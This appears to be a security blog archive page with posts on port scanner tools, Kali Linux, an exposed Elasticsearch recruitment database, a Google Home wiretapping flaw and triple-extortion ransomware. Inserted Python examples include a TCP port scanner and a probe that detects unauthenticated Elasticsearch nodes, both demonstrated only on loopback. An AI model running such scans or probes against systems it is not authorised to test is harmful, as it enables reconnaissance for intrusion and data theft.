Jan 04 2023

Top 10 Open Port Scanner and Port Checker Tools for 2023

Category: Security vulnerabilities | DISC @ 11:19 am

Port scanners and port checker tools are essential for finding open ports and determining the status of each port.

An open port is a TCP or UDP port number that is configured to accept packets.

Web pages or FTP services require their particular ports to be “open” on the server in order to be freely reachable.

What is the Open Port Scanner?

An open port scanner is a tool used to check your external IP address and identify open ports on the connection.

It is used to detect whether port forwarding is set up correctly or whether server applications are being blocked by a firewall.

Port checker tools are used to examine the network for ports that are commonly forwarded.

Some ports, such as port 25, are usually blocked at the ISP level to intercept suspicious activity.

Each packet carries a port number, which lets the protocol stack determine the intended destination and route the packet accordingly.

Most Used Ports

20 FTP – Data
21 FTP – Control
22 SSH Remote Login Protocol
23 Telnet
25 Simple Mail Transfer Protocol (SMTP)
110 POP3
115 Simple File Transfer Protocol (SFTP)
118 SQL Services
53 Domain Name System (DNS)
443 HTTPS
143 IMAP
389 LDAP
37 Time Protocol
123 Network Time Protocol
530 Remote procedure call
547 DHCPv6 server

Time needed: 5 minutes.

How to Scan Open Ports in Windows?

  1. Press the Windows key and the R key at the same time to open the Run dialog.
  2. Type cmd and hit enter to open the command prompt.
  3. In the command prompt type “netstat -a” and hit enter.
  4. In a few seconds, it displays a complete list of ports and the connections established on them.

Best Port Checker & Port Scanner Tools

  • Advanced Port Scanner
  • TCP Port Scan with Nmap
  • IPVOID
  • Network Port Scanner Tool
  • DNS Tools
  • Web Proxy and Privacy Tool
  • SolarWinds Port Scanner
  • IP Tool
  • UltraTools
  • Yougetsignal

Advanced Port Scanner

Open Port Scanner
Output displaying ports enabled

This open port scanner is fast, easy to use, and freely available.

It helps to find open ports on network computers and to identify the kind of programs running on the detected ports.

The program has a flexible interface and practical functionality.

Key Features

  • Fast port scanning
  • Remote access
  • Getting information on network devices
  • Wake-On-LAN
  • Easy access
  • Run commands on the remote computer

TCP Port Scan with Nmap

This open port scanner tool helps to identify which TCP ports are open on your target machine and also provides OS information, service information, and a traceroute.

The Nmap port scanner tool is a web interface for the well-known Nmap port scanner, which it runs with parameters chosen to give speed and accuracy.

Open Port Scanner
Zenmap/Nmap port scanner

The scan sends packets to each port and listens for an acknowledgment.

This is called a ‘SYN scan’: it sends a TCP SYN packet to each port. If a port replies with SYN-ACK, it is flagged as open and the Nmap port scanner sends back an RST.

In this way, no full TCP connection is established with the target machine.
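The following is an added example, not code from the page or from Nmap, that shows the simplest form of the port check the tools above perform: a TCP connect probe. Unlike the SYN scan just described, it completes the full three-way handshake (so it needs no raw sockets or privileges, but it is visible in the target's connection logs). The listener fixture, the `free_port` helper and the loopback target are constructed for the demonstration; nothing here touches a remote host.

```python
import socket
from contextlib import contextmanager


def check_port(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port completes.

    This is a full-connect check: the kernel finishes the three-way
    handshake, so the probe shows up in the target's connection logs.
    Nmap's SYN scan instead sends a bare SYN and answers the SYN-ACK
    with an RST, which requires raw sockets and privileges.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return True
        except ConnectionRefusedError:
            return False          # RST came back: nothing is listening
        except (socket.timeout, OSError):
            return False          # no answer at all: typically dropped by a firewall


def scan_ports(host, ports, timeout=1.0):
    """Map each port to True (open) or False (closed or filtered)."""
    return {port: check_port(host, port, timeout) for port in ports}


@contextmanager
def local_listener(host="127.0.0.1"):
    """Constructed fixture: a socket in LISTEN state on an ephemeral port.

    The kernel completes handshakes into the listen backlog even though
    nothing ever calls accept(), which is all the connect check needs.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    try:
        yield srv.getsockname()[1]
    finally:
        srv.close()


def free_port(host="127.0.0.1"):
    """Constructed helper: a port nothing is bound to at this moment."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind((host, 0))
        return tmp.getsockname()[1]


def demo():
    """Scan one listening port and one closed port on loopback."""
    with local_listener() as open_port:
        closed_port = free_port()
        return scan_ports("127.0.0.1", [open_port, closed_port])


if __name__ == "__main__":
    for port, is_open in demo().items():
        print(f"127.0.0.1:{port} -> {'open' if is_open else 'closed'}")
```

A refused connection and a timed-out one are both reported as "not open" here; a production checker would keep them apart, because a timeout usually means a firewall is silently dropping the probe (what Nmap reports as "filtered") rather than that the port is closed.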

Key Features

  • Port Scanning
  • Custom scanning options
  • Able to discover network devices

IPVOID

IPVOID helps to identify services running on the server and to view open TCP ports.

It also checks whether the firewall is working correctly. Some security services block scans of IP addresses you do not own, so avoid checking those.

Open Port Scanner
IPVOID port Scanner

The online tool offers a wide range of scanning options to discover details about IP addresses.

Key Features

  • Base64 to Image
  • IPv4 CIDR Checker
  • DiG DNS Lookup
  • IP Geolocation
  • Multi URL Opener

Network Port Scanner Tool

This open port scanner tool helps to check which services are available and running on the server.

If you want to know which OS version is running, whether ports are open on a server, and whether the server has a firewall enabled, the tool gathers all of this information using raw IP packets.

Network Port Scanner Tool

This tool is extremely useful for finding out whether your port forwarding is set up correctly and whether your server applications are being blocked by a firewall.

Key Features

  • Port scanning
  • Firewall Detection
  • IP Finder
  • Open Port detection

DNS Tools

It helps you identify which services are reachable from outside the intranet. Machines that reach the internet through a NAT router cannot be reached from outside the intranet.

However, with port forwarding, ports can be redirected from the router to a particular machine.

MxToolBox

This online open port scanner lets you verify whether that redirection works correctly.

Key Features

  • Round-trip SMTP monitoring.
  • Inbound and outbound email tests and header analysis.
  • Performance metrics and historical statistics.
  • Configurable real-time alerts.
  • Customizable timeouts.

Web Proxy and Privacy Tool

This online tool is also known as “HideMy[.]name”. If you want to hide your identity while accessing content, use a web proxy.

This tool hides and changes your IP address and location, so you stay incognito while using the browser.

Open Port Scanner
Proxy Tool

It acts as an intermediary between your machine and the requested website. You can also watch blocked content and play online games.

You can browse the internet at full speed with a stable connection. It gives protection, privacy, and freedom on any device while browsing.

Key Features

  • VPN Service
  • Hide Network Activity
  • Protect Passwords
  • Unrestricted Internet Access

SolarWinds Port Scanner

It scans all IP addresses and TCP and UDP ports to check for network vulnerabilities.

You can run the scan from the command line as well, save scan configurations, and shorten scan run time with multi-threading. It can also trace end-user and terminal machine connection activity.

Solar Winds Port Scanner

It identifies unknown vulnerabilities and network protocols.

Key Features

  • Automated network discovery
  • Real-time monitoring and alerting
  • Powerful diagnostic capabilities
  • Enhanced network security

IP Tool

IP Tool is the port scanner known as “whatismyip[.]com”.

This tool scans the network for open ports and helps you decide whether those open ports should be closed to improve network security and reduce exposure.

Ip Tool

This open port scanner tool shows which ports are open for communication on a network. If a port is open, it is available for remote communication.

Key Features

  • IP Address Scanner
  • IP Address Tracker
  • Infoblox DNS and DHCP Monitoring
  • IP Address Discovery

UltraTools

With UltraTools you can check DNS performance and the DNS records for a domain or hostname.

The DNS Traversal Tool shows whether the DNS records have propagated to all name servers.

Ultratools

It is a cloud-based authoritative DNS service that securely delivers fast and accurate query responses to websites and other vital online assets.

Key Features

  • SiteBacker — Monitoring & Failover
  • Traffic Controller
  • Directional DNS
  • DNS Shield

Yougetsignal

Yougetsignal is an open port checker tool that lets you check any external IP address for open ports.

It is useful for checking the restrictions placed by a firewall. With this tool, you can check all TCP and UDP ports.

Open Port Scanner and Port Checker Tools
Yougetsignal Open port checker

With the port scanner tools listed above, you can determine the open ports in your network infrastructure.

It is always recommended to close the ports if they are not in use for security reasons.

Key Features

  • Port Forwarding Tester
  • What Is My IP Address
  • Network Location Tool
  • Visual Trace Route Tool

Conclusion

Listed above are some of the free tools available online to check for open ports on a server and to run other DNS queries.

We have categorized some of the best port scanner and port checker tools to help find open ports and carry out other port-related operations while performing a penetration test on the network.

What is the Security Risk due to Open Ports?

Most malicious software behaves like a service waiting for connections from a remote attacker in order to hand over data or control of the machine.

The most common security practice is to close unused ports on private machines, in order to block access to any service that may be running on the PC without the user’s knowledge, whether because an authorized service is misconfigured or because of malicious software.

Is Port Scanning Illegal?

Port scanning itself is not illegal, but scanning a destination host without authorization is illegal and will get you into trouble.

TCP port scanners help server administrators and penetration testers examine which ports admit data into the network and protect it from intruders.
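As an added example (not code from the page or from any of the tools listed), here is the audit a defender would run after the `netstat -a` procedure above, putting the "close unused ports" advice into practice: parse netstat-style output, keep only sockets that accept inbound traffic, ignore loopback-only bindings, and report anything reachable from other hosts that is not on an allowlist of expected services. The netstat sample and the allowlist are constructed for the demonstration.

```python
import re
from dataclasses import dataclass

# Constructed sample of Windows `netstat -an` output; not taken from the page.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:5432         0.0.0.0:0              LISTENING
  TCP    192.168.1.10:49700     52.96.0.1:443          ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*
  UDP    127.0.0.1:1900         *:*
"""

# Hypothetical allowlist of (protocol, port) pairs this host is expected to expose.
ALLOWLIST = {("TCP", 135), ("TCP", 445), ("UDP", 123)}

# proto, local endpoint, foreign endpoint, optional state (UDP lines have none)
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


@dataclass(frozen=True, order=True)
class Listener:
    proto: str
    port: int
    address: str

    @property
    def loopback_only(self):
        """Bound to 127.x or ::1, so unreachable from other hosts."""
        return self.address == "::1" or self.address.startswith("127.")


def split_endpoint(endpoint):
    """'0.0.0.0:135' -> ('0.0.0.0', 135); '[::]:135' -> ('::', 135)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def parse_listeners(text):
    """Extract the sockets that accept inbound traffic from netstat output."""
    listeners = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue                      # header lines and blanks
        proto, local, _remote, state = match.groups()
        if proto == "TCP" and state != "LISTENING":
            continue                      # established/wait states are not services
        host, port = split_endpoint(local)
        listeners.append(Listener(proto, port, host))
    return listeners


def unexpected_listeners(listeners, allowlist):
    """Listeners reachable from other hosts that are not on the allowlist."""
    return sorted(
        {item for item in listeners
         if not item.loopback_only and (item.proto, item.port) not in allowlist}
    )


def audit(text=SAMPLE_NETSTAT, allowlist=ALLOWLIST):
    """Run the parse-and-compare audit; returns the listeners to review."""
    return unexpected_listeners(parse_listeners(text), allowlist)


if __name__ == "__main__":
    for item in audit():
        print(f"review: {item.proto} {item.address}:{item.port} is exposed but not allowlisted")
```

On the sample the only finding is TCP 3389 bound to 0.0.0.0; the PostgreSQL-style listener on 127.0.0.1:5432 is skipped because it is not reachable from the network, and the ESTABLISHED client connection is skipped because it is not a service.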


Infosec books | InfoSec tools | InfoSec services

Tags: Port Checker Tools, Port Scanner


Jan 03 2023

Kali Linux: What’s next for the popular pentesting distro?

Category: Linux Security, Pen Test | DISC @ 2:18 pm

If you’re interested in penetration testing and digital forensics, you know that Kali Linux is worth a try. And if you’re already doing it, chances are good you are already using it.

We talked to Jim O’Gorman, Chief Content and Strategy Officer at Offensive Security (OffSec), about the direction in which the development of the open-source distro is headed.

[The answers have been edited for clarity.]

Kali Linux keeps growing and improving. How much does user feedback influence where you want to go next? What do users want the most?

Two questions drive Kali’s development:

1. What needs to be done to ensure that Kali Linux is the best possible platform for professional and hobbyist information security work?
2. What needs to be done to ensure that Kali is the best possible platform for information security training?

There is a lot of overlap between those two questions, but realistically they are separate and distinct items. However, by getting them both right on a single platform, we create an environment where people can train, study, and learn, but also use the same platform for real-world efforts. In essence, it means that you train like you fight.

The answer to the first question is driven by input from the Kali and OffSec teams. As infosec professionals ourselves, what are the things we run into on a day-to-day basis and how do we make our life easier by ensuring the toolset is of the highest quality possible? We also work closely with OffSec’s pentesting team.

We also listen to input from other Kali users. Kali is a totally open-source project and anyone and everyone can pitch in and contribute. And they do! If you wish a tool to be included in Kali, package it and submit it! If you wish a configuration worked a certain way out of the box, modify the package and submit the change. It’s very direct and easy to do, and it is in our documentation. Anyone – regardless of their background – can play a part.

The second way users influence development is through bug reports, feature requests, and conversations on OffSec’s Discord and other social media. The Kali team is out there as part of the infosec community – talk to us and let us know what you are seeing. Also, when possible, we will set up private conversations with large organizations that use Kali to get a feel for their unique needs.

For the second question – how to make Kali the best possible platform for training? – we work very closely with the OffSec content development team to find out what tools they are using for training, what sort of default environment works best for learners, and what we can do in Kali to support general education efforts.

Surprisingly, even though Kali is built for advanced information security work, it is often the first Linux many users ever use. So we are careful with the design of Kali to ensure that it is approachable. We want to ensure that you don’t have to be a Linux professional to utilize Kali successfully in OffSec courses.

What’s your vision for Kali Linux in the next 12 months? What areas need polishing?

The changing of attack techniques over time does not impact Kali as much as you might think, as techniques are more often than not implemented in tools and scripts. While the tools and scripts change, Kali Linux as a platform to launch them does not have to change much. The closest item to this is expanding Kali to run everywhere. Our goal is to put the Kali toolset as close as possible to you no matter where you are.

Kali installed on bare metal, Kali in a VM, Kali in containers (Docker & LXC), Kali on WSL, Kali on various ARM devices such as Raspberry Pi, Kali in a cloud instance such as AWS and Azure, Kali on your Android phone or tablet – we even have Kali running on a watch! No matter where you are or what your needs are, we want Kali to be easy to access and run.

Kali is primarily geared towards pentesting and red teaming, but we are looking at expanding into other areas of information security as well.

Kali Linux comes with a myriad of tools. What’s the process for including or removing a piece of software? What tools are used the most?

What tools run in Kali is really a matter of input from the team, community, and OffSec. Our goal is to have the most frequently used and important tools installed and working out of the box. Other common tools are installed quickly and easily with a single command.

We add new tools based on the answers to a number of questions: What functionality does the tool provide and is it unique or different enough from the functionality of other tools? Is the tool going to be maintained and updated over a reasonable period of time? How functional is the tool? Is it a wrapper for another tool? Does the developer have a positive reputation?

If a tool stops being updated and stops working, we’ll try to work with the author. If they are unresponsive and the effort of maintaining the tool becomes too complex, we document this and then often remove it.

We get a lot of input from the OffSec pentesting team on what tools they are using in the field today, as well as the OffSec content developers on what tools are being used as part of the courseware. The idea is to have all the tools used in OffSec coursework out of the box to keep things easy for students.

Do major software development trends influence your approach to enhancing Kali Linux? How do you prioritize features?

When prioritizing features, we look at what is needed at the current time. We release Kali in quarterly updates so that dictates our development cycle. Each cycle we look at what is happening in the industry, where the gaps are, and determine what to prioritize.

On this front, there is a lot to balance. Everything from the distribution of Kali, installation, user experience, tools, stability, so on and so forth. It’s a full operating system and a small team so we have to pick and choose what goes into it, we can’t do everything each cycle. Again, input from the community and OffSec sets the priorities.

There’s been a lot of buzz around AI lately. Do you expect AI to play a role in future Kali Linux versions?

As Kali is a base OS, not right now. For tools that run in Kali, perhaps in time. As soon as the tools are there we will add them into Kali if they are any good. But there are also always fad trends so we tend not to get over-excited about them until they start to actually deliver results.

We have seen demonstrations of tools being developed with some of the PoC which have been creating some buzz, but as they are not ready to be released we are a ways off from this yet.

Kali Linux 2022.4 released | OpenSourceFeed


5 Kali Linux tools you should learn how to use

5 Kali Linux books you should read this year

New Book: Advanced Security Testing with Kali Linux!


Tags: Kali Linux


Jan 03 2023

Top ERP Firm Exposing Half a Million Indian Job Seekers Data

Category: data security | DISC @ 10:28 am

At the time of writing, a misconfigured server belonging to an Enterprise Resource Planning (ERP) software provider based in California, United States was still exposing data to the public without any authentication or password.

An Elasticsearch server belonging to a major international IT recruitment and software solution provider is currently exposing the personal data of more than half a million Indian candidates looking for jobs.

However, the data is not limited to job seekers, as the server is also exposing the company’s employees’ data. Another important aspect of this data exposure is that it also contains the company’s client records from different companies, including Apple and Samsung.

This was confirmed to Hackread.com by Anurag Sen, a prominent independent security researcher. What is worse, the server is still exposed and publicly accessible without any security authentication or password. Originally, the server was being exposed since late December 2022.

It all started when Anurag scanned for misconfigured databases on Shodan and noted a server exposing more than 6GB worth of data to public access. Anurag said that the server belongs to a company originally based in the United States with offices around the globe, including India, while the database contains details of job seekers in India.

Hackread.com would not share the name of the company in this article because the server is still exposed.

Exposed Data

Anurag’s analysis of the server revealed that the exposed records contain personal data of over 575,000 individuals, while the data is over 6.3GB in size and growing with new records each day. This data includes the following:

  • Full Name
  • Date of birth
  • Email address
  • Phone number
  • Resume details
  • Employer details

The screenshot below shows the candidate details and client data that are currently being exposed:

Image credit: Anurag Sen – Hackread.com

The screenshot below was taken from the live server that shows the company’s client details. Some of these are top companies Apple, Samsung, Sandisk, Unilog, Moody, Intuit, NEC Corporation, Falabella and many more.

The company’s client list also indicates that it’s a high-profile business with a presence all over the globe.

Top recruitment firm exposes half a million candidates' data from India
Screenshot credit: Anurag Sen – Hackread.com

Indian CERT Alerted

Since the server is still live at the time of writing, Anurag alerted the Indian Computer Emergency Response Team over the weekend. However, there has been no response from the authorities yet.

India and server misconfiguration

India is home to almost 1.4 billion people. This makes the country a lucrative target for businesses as well as cybercriminals. The more the investment, the more widespread and vulnerable the IT infrastructure becomes.

Last year, several top data exposure-related incidents involving tens of millions of victims were reported from India. These included Indian Federal Police and banking records, Covid antigen test results, MyEasyDocs, online packaging marketplace Bizongo, etc.

Impact

It is yet unclear whether a third party accessed the database with malicious intent, such as ransomware gangs or threat actors. However, if it did, it would be devastating for the victim and the healthcare firm responsible for the server.

Furthermore, considering the extent and nature of the exposed data, the incident can have far-reaching implications, such as bad actors downloading the data, carrying out phishing scams, or identity theft-related fraud.

Hackers can hold the company’s server or data for ransom and leak it on cybercrime forums if their demands are not met. Nevertheless, the victims in this situation are the job hunters who trusted authorities with their personal information.

Misconfigured Databases – Threat to Privacy

Misconfigured or unsecured databases, as we know, have become a major privacy threat to companies and unsuspecting users. In 2020, researchers identified over 10,000 unsecured databases that exposed more than ten billion (10,463,315,645) records to public access without any security authentication.

In 2021, the number increased to 399,200 exposed databases. The top 10 countries with top database leaks due to misconfiguration in 2021 included the following:

  • USA – 93,685 databases
  • China – 54,764 databases
  • Germany – 11,177 databases
  • France – 9,723 databases
  • India – 6,545 databases
  • Singapore – 5,882 databases
  • Hong Kong – 5,563 databases
  • Russia – 5,493 databases
  • Japan – 4,427 databases
  • Italy – 4,242 databases
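The exposure described in this article comes down to one condition: an Elasticsearch REST endpoint that answers an unauthenticated request with cluster data instead of a 401 challenge. As an added example (not code from the page or from Elasticsearch), here is a defender's probe for that condition, run against two constructed loopback stand-ins, one anonymous and one that requires credentials. The fake node, its banner contents and the verdict labels are assumptions made for the demonstration; the real-node check is the shape of the root document a node returns, which is what `probe_elasticsearch` inspects.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError, URLError
from urllib.request import ProxyHandler, Request, build_opener

# Ignore proxy environment variables so the loopback demo stays local.
_opener = build_opener(ProxyHandler({}))


def probe_elasticsearch(base_url, timeout=3.0):
    """Classify an Elasticsearch HTTP endpoint by its answer to an unauthenticated GET /.

    Returns 'open' when the node serves its cluster banner with no credentials,
    'secured' when it challenges with 401/403, 'not-elasticsearch' for any other
    answer, and 'unreachable' when no connection could be made.
    """
    req = Request(base_url.rstrip("/") + "/", headers={"Accept": "application/json"})
    try:
        with _opener.open(req, timeout=timeout) as resp:
            raw = resp.read().decode("utf-8", "replace")
    except HTTPError as exc:
        return "secured" if exc.code in (401, 403) else "not-elasticsearch"
    except (URLError, OSError):
        return "unreachable"
    try:
        body = json.loads(raw)
    except ValueError:
        return "not-elasticsearch"
    # A node's root document carries cluster_name and a version object;
    # an arbitrary web server answering 200 does not.
    if isinstance(body, dict) and "cluster_name" in body and "version" in body:
        return "open"
    return "not-elasticsearch"


class FakeNode(BaseHTTPRequestHandler):
    """Constructed stand-in for a node; subclasses set `secured` to demand auth."""
    secured = False

    def do_GET(self):
        if self.secured:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="security"')
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        payload = json.dumps({
            "name": "node-1", "cluster_name": "demo-cluster",
            "version": {"number": "8.0.0"}, "tagline": "You Know, for Search",
        }).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def log_message(self, *args):  # keep the demo quiet
        pass


def serve_fake_node(secured):
    """Start a loopback HTTP server on an ephemeral port; the caller shuts it down."""
    handler = type("Node", (FakeNode,), {"secured": secured})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}"


def demo():
    """Probe one anonymous node and one that requires credentials."""
    results = {}
    for label, secured in (("anonymous", False), ("auth-required", True)):
        server, url = serve_fake_node(secured)
        try:
            results[label] = probe_elasticsearch(url)
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label}: {verdict}")
```

Run this only against clusters you administer; an "open" verdict on port 9200 of a host that is reachable from the internet is exactly the state the article describes, and the fix is to enable authentication on the node and to keep the HTTP port off the public interface.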

Top recruitment firm exposes half a million candidates' data from India

Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World


Tags: Job Seekers Data


Jan 02 2023

Cyber Crime: The Dark Web Uncovered

Category: Cybercrime, Dark Web, Information Security | DISC @ 2:54 pm

Cyber Crime: The Dark Web Uncovered

11 of the world’s top cyber security experts gather to discuss how to protect ourselves against cybercrime. Includes interviews with Rob Boles, Jesse Castro, Michael Einbinder-Schatz, Rick Jordan, Konrad Martin, Rene Miller, Paul Nebb, Will Nobles, Adam Pittman, Leia Shilobod, and Peter Verlezza.

Director: Jeff Roldan. Starring: 11 top cyber security experts.

Genre: Documentary. Subtitles: English [CC]. Audio languages: English.

Tags: cyber crime, dark web


Jan 02 2023

Windows PowerShell Tutorial and Cheat Sheet

PowerShell Cheat Sheet

Powershell : The Complete Ultimate Windows Powershell Beginners Guide. Learn Powershell Scripting In A Day!

Mastering PowerShell Scripting: Automate and manage your environment using PowerShell



Tags: Powershell Security


Jan 02 2023

3 important changes in how data will be used and treated

Category: Data Breach, Data mining, data security | DISC @ 11:51 am

Regula has presented their vision of the developments that will shape the industry’s landscape in 2023. Deepfakes, new cyber-hygiene norms, and demand for mature ID verification platforms are among some of the predictions for the next year.

While more and more industries move their customer experiences to digital, online identity verification is becoming an essential part of our life. It lets people cope with all sorts of mission-critical activities online: opening bank accounts, applying for benefits, getting insurance payouts, and even getting medical advice.

Still, the security of the digital IDV process is the number one concern that is forming the industry’s landscape and driving the majority of significant changes.

Javelin Strategy & Research reports that in 2022, identity fraud and scams cost $52 billion and affected over 42 million people in the US alone. The rising number of identity fraud cases, along with fraudsters’ hunger for personal information collected by service providers, will lead to three important changes in how data will be used and treated:

  • Even industries that are not so heavily regulated will invest more in the ID verification process, adding extra security layers. There will be more checks with increased complexity and additional steps in the verification process: biometric checks, verifying IDs, SMSs, and passwords, checking recent transactions, etc.
  • This will lead to prioritization of comprehensive liveness checks to make sure that submitted documents are valid and really exist. An ID document contains various security features: holograms, elements printed with optical variable inks, and biometric data, to name a few, and an image of it should be taken using methods so that these elements can be captured and verified.
  • Regula experts expect to see a push from users for more data protection rules, and for more transparency from online businesses. In the wake of multiple public disclosures of data leaks, users are gradually losing trust in how their data is treated and becoming more cautious about what they share with third parties and how. Addressing this trend, companies will attempt to bring that trust back via increased investments in customer data protection measures.

When it comes to more complex identity fraud cases related to synthetic media like deepfakes, experts expect to see a rise in amateur scam attempts along with the emergence of next-gen biometric-related fraud.

Both trends are developing in parallel and are powered by the same factor: the growing maturity and availability of machine-learning based technologies that make it possible to fake photos, videos, voices, and other characteristics previously considered unique.

Based on the opinion of Regula experts, all these trends will lead to a market that is developed enough to embrace mature end-to-end IDV solutions that are capable of not only verifying documents, but also biometric characteristics, like face, voice, and fingerprints.

“The good news is that minimal security measures are currently enough to repel 95% of possible attacks. The remaining 5% is where the difficulties lie. Now, most deepfakes are created for free, and they’re of such a quality that there’s no immediate danger. But that’s a matter of how many resources fraudsters will be willing to invest. At the moment, when they’re ready to spend significant amounts of money per deepfake, it’s a problem that requires interactive multi-layered protection. So if we picture the trends above as a scale, where convenience for the customer is on one end and security on the other, the balance is shifting to the latter,” notes Ihar Kliashchou, CTO at Regula.

In relation to this year’s trending topics — digital identity and decentralized identity — the company’s experts have their own take on that:

  • In the ideal world, a universal digital identity would help eliminate most of the issues with fake identities. However, in reality, creating and gaining broad acceptance and implementation of a secure single source of truth is going to take a significant amount of time. Still, we’re already seeing more different local and even company-based digital identities trying to become a single source of truth on a local level.
  • The idea of decentralized identity is going to be held back for some time. With the benefit of being built on blockchains and allowing users to control their digital identifiers, this system still comes with weaknesses. Since no one controls it centrally, no one will be responsible for it in case of any problems. Additionally, there is the matter of trust. Blockchain is strongly associated in people’s minds with crypto, and the FTX crash that has happened in the last couple of months has undermined people’s trust in it.



Tags: data security


Jan 02 2023

Google Home Vulnerability: Eavesdropping on Conversations

Category: Cyber Espionage, Cyber surveillance | DISC @ 11:01 am

Matt Kunze, an ethical hacker, reported wiretapping bugs in Google Home Smart Speakers, for which he received a bug bounty worth $107,500.

Google Assistant is currently more popular among smart home owners than Amazon Alexa and Apple Siri, given its superior intuitiveness and ability to conduct lengthy conversations. However, according to the latest research, a vulnerability in Google Home smart speakers could allow attackers to control the device and eavesdrop on user conversations indoors.

Findings Details

The vulnerability was identified by Matt Kunze, a security researcher using the moniker DownrightNifty Matt. The researcher revealed that, if exploited, the vulnerability could allow the installation of backdoors and turn Google Home smart speakers into wiretapping devices. Google fixed the issue in April 2021 following responsible disclosure on 8 January 2021 and the development of a proof-of-concept for the company.

Possible Dangers

The vulnerability could let an adversary present within the device’s wireless proximity install a backdoor account on the device and start sending remote commands, access the microphone feed, and initiate arbitrary HTTP requests. All of this could be possible if the attacker is within the user’s LAN range because making malicious requests exposes the Wi-Fi password of the device and provides the attacker direct access to all devices connected to the network.

What Caused the Issue?

Matt discovered that the problem was caused by the software architecture used in Google Home devices as it let an adversary add a rogue Google user account to their target’s smart home devices.

For the attack to work, a threat actor would have to trick the individual into installing a malicious Android application. It would detect a Google Home automation device connected to the network and stealthily start issuing HTTP requests to link the threat actor’s account to the victim’s device.

In addition, the attacker could stage a Wi-Fi de-authentication attack to disconnect the Google Home device from the network and force the appliance to initiate a setup mode and create an open Wi-Fi network. Subsequently, the attacker can connect to this network and request additional details such as device name, certificate, and cloud_device_id. They could use the information and connect their account to the victim’s device.

According to Matt’s blog post, the attacker could perform a range of functions, such as turning the speaker’s volume down to zero and making calls to any phone number apart from spying on the victim via the microphone. The victim won’t suspect anything because just the device’s LED turns blue when the exploitation happens, and the user would think the firmware is being updated.

Matt successfully connected an unknown user account to a Google Home speaker. He created a backdoor account on the targeted device and obtained unprecedented privileges that let him send remote commands to the Home mini smart speaker, access its microphone feed, etc. Watch the demo shared by the researcher:

It is worth noting that there’s no evidence this security loophole was misused since its detection in 2021. Being an ethical hacker, the researcher notified Google about the issue, and it was patched. Matt received a bug bounty worth $107,500 for detecting this security flaw.

Wiretapping Bugs Discovered in Google Home Smart Speakers

Tags: Eavesdropping on Conversations


Dec 31 2022

Windows event log analysis

Category: Information Security, Windows Security | DISC @ 1:37 pm

Windows Security Monitoring: Scenarios and Patterns

Malware Forensics Field Guide for Windows Systems



Tags: Windows event log analysis, Windows Malware Forensics, Windows Security Monitoring


Dec 31 2022

Triple Extortion Ransomware: How to Protect Your Organization?

Category: Ransomware | DISC @ 12:06 pm

Ransomware strikes businesses every 11 seconds. The ransomware attack volume is already at record levels, but we’re hearing it’s only getting worse.  

As some victims managed to take precautions and refused to pay the ransom, attackers began to add more layers to their attacks. 

Double extortion ransomware became a common tactic in 2021. But in 2022, the attackers presented an innovation in their attacking technique called triple extortion. 

What is a triple extortion ransomware attack, and how can you protect your business? Read on to find out.

Triple Extortion Ransomware

What is Double extortion ransomware?

It is becoming increasingly common for attackers to extort businesses and individuals twice with the same ransomware attack: the criminals encrypt the victim’s data and also threaten to release it publicly if a ransom is not paid. This type of cybercrime is called “double extortion.”

As soon as the attacker exfiltrates the data they wish to leverage, they launch the encryption attack. Next, the attacker threatens to expose the data, possibly selling personal data about customers. 

In most cases, even organizations that have paid the ransom have found their data to be leaked. 

In September 2022, the SunCrypt ransomware group used DDoS as an additional attack layer: attackers threatened to overwhelm the victim’s servers with traffic if the ransom was not paid.

Malicious actors such as Avaddon and REvil soon started to follow the same tactic. The addition of DDoS extortion attacks is expected to continue, given the increased use of IoT devices and the surge in bitcoin.

What is Triple Extortion Ransomware Attack?

In triple extortion, attackers demand payment from the company that was initially compromised and those whose information was stolen.

The first case of triple extortion was observed when Vastaamo, a Finland-based psychotherapy clinic, was breached. Even after the clinic paid the ransom, attackers threatened the therapy patients with releasing their session notes.

Another instance of triple extortion occurred last year when the attacker targeted Apple after their first victim, hardware supplier Quanta, refused to pay. 

In this case, criminals proved they could compromise key suppliers if they gained leverage over the initial victim.

Remember, such an assault can cause irreparable damage to the reputation of any company, regardless of the industry.

Leading Causes of Double and Triple Extortions

The main factors that contribute to the increase in double and triple extortions include:

  • The proliferation of ransomware-as-a-service (RaaS) platforms has made it easier for attackers to launch these attacks. 
  • Using cryptocurrency has made it more difficult for law enforcement to trace and track payments. 
  • The emergence of new ransomware strains specifically designed for double and triple extortions. 

Who is vulnerable to Triple extortion ransomware?

Attackers target companies with inadequate cybersecurity solutions and less mature security teams. They also prey on companies that can afford to pay the ransom demands.

The most obvious targets for ransomware operations are companies and organizations that store client or customer data.

Any organization that owns or controls important data, or is connected to one that does, is at risk of triple extortion.

How to prevent triple extortion ransomware attacks?

Many ransomware attacks remain undetected and unreported until they reach the domain controller. A detection-centric approach will only warn businesses of attacks that are already underway. The most effective course of action is prevention. 

Here are effective ways to prepare against triple extortion attacks:

Keep your network secure

